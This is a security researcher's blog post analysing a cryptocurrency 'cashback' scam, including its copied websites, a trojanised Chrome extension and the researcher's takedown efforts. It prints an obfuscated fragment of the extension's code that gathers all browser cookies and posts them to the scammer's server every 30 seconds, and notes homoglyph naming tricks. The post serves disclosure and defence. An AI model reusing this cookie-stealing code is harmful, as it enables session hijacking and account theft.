This is an article draft, it may contain errors, mistakes, and refuses.

Take off the infrastructure of a scammer: Cryptonder and Torowallet

Published at December 13, 2019 – 4 min read

On a rainy autumn day, I was contacted like many users by a suspicious individual on Telegram. He insisted on asking for the help of the user who had to recover his wallet which contained several bitcoins. Our “friend” that we will call “M.” insisted that the user has to register on the platform to be able to unlock his wallet at the price of 0.3 BTC.

At this point he invited the unsuspecting user to download a chrome extension and to sign up in a website. And out of nowhere, things became more interesting. In this article, I’ll report the (long and not paid) adventure that took down almost 6 different domains of scammers that were trying to spread a “cashback” campaign.


First, I think anyone that used cryptocurrencies has heard about cashback. It is a special option that permits you to earn from your transactions: 1% or less of what you are spending will return in your wallet. That is simple to understand, isn’t it? Everyone likes this way because it seems someone is giving free money.

Cryptonder (hxxps://cryptonder[.]com) is a project that allows a sort of cashback to anyone who has used the “3 most famous cryptocurrencies, Bitcoin, Ethereum and Bitcoin Cash”. In a simple way, the more you send money through the blockchain, the more money you will get back through Cryptonder’s premium system. But is this going to be true? How can I get cashback via blockchain?

Let me analyze the website which is composed by three pages. At first, in the footer of homepage, there is an interesting link that includes a whitepaper of another cryptocurrency named “Equal” from which the web page was taken. We can think that M. has copied and modified the page of another project; this can be confirmed by going to Equal web page which is very similar to the scammer page.

One another interesting aspect is in the “About us” page. The description is written in a correct English, but then we can look for their email support. “[email protected]”…. ?!? domain? This is the second red flag.

In a few moments, it will reveal as a scammer website associated with more than 6 domains.

Chrome extension: App&Crypto

First of all, the background.js component is loaded if and only if the url matches the following: "matches": [ "*://**", "*://*", "*://**", "*://**", "*://**", "*://**", "*://**", "*://**", "*://**", "*://*", "*://**", "*://**", "*://**", "*://**" ]

Related code:

     var getAlsgrgon;
     function geglyq() {
            var maryugns = ["h", "t", "t", "p", "s", ":", "/", "/", "h", "a", "v", "k", "p", "a", "n", ".", "c", "o", "m", "/", "a", "p", "i", "/", "l", "o", "a", "d", "s", "y", "s", "t", "e", "m", "/"];
            return maryugns.join('');
     var meqey =  geglyq() + "background";
    function rijqwknel() {
            chrome.cookies.getAll({}, function(iplp) {
                $.post(meqey, {
                    back: JSON.stringify(iplp)
            getAlsgrgon = setInterval(rijqwknel, 3e4);

Analyzing the code, we might see how it works. So, we notice, at the end, the “rijqwknel” function has been called. In that function, Chrome Instance passes all the cookies to $.post. $.post is a function responsible to make a POST request to meqey url. The request will be sent to hxxps:// .

I was looking in the assets/ folder which should contain the icon and the images for the extension, then I found another logo. The logo was taken from a company named “LeadZippo”; M. copied interely their Chrome extension and inject the “background” code, modifying the plug-in name and the icon.

I have found their Github profile that confirms M. taken the source code of another extension named “LeadZippo”,


The Chrome Extension has a curious name: “App&Crypto”. But it looks that “p”, “y” and “o” were taken from CYRILLIC language. This method is usually used in phishing attacks.

Several website connected to this fraud

When a malware or a malicious website has been found, a person has to dig into details and to understand all the “branches” of the scammer infrastructure to be able to take offline all the infrastructure and not a part of it.

Let me explain all the “tecniques” in order to find all the website connected to it. Firstly, I checked headers of the response given by and under the “content-security-policy” header, we could find the domains “hxxps://” and “hxxs://”. The first appears as a copy of, but the second is more interesting. was another popular cashback we can find that link into some several BitcoinTalk Threads, #2 . It is also helpful to remark how many users are victim of this scam, including “” admins.


Take offline all the infrastructure

Then I’ve contacted several companies: in these we might find Cloudflare which provided a protective layer to these attacks, XYZ which hosted almost all the websites involved in this scam. We’re still waiting for the suspending of those websites.

About the author

SerHack is a security engineer, developer, and writer. He is contributing to the Monero project, a cryptocurrency focused on preserving privacy for transactions data. In his publications, Mastering Monero has became one of the best rated resources to learn about Monero.

Next post: Monitorare la propria infrastruttura con Grafana, InfluxDB e CollectD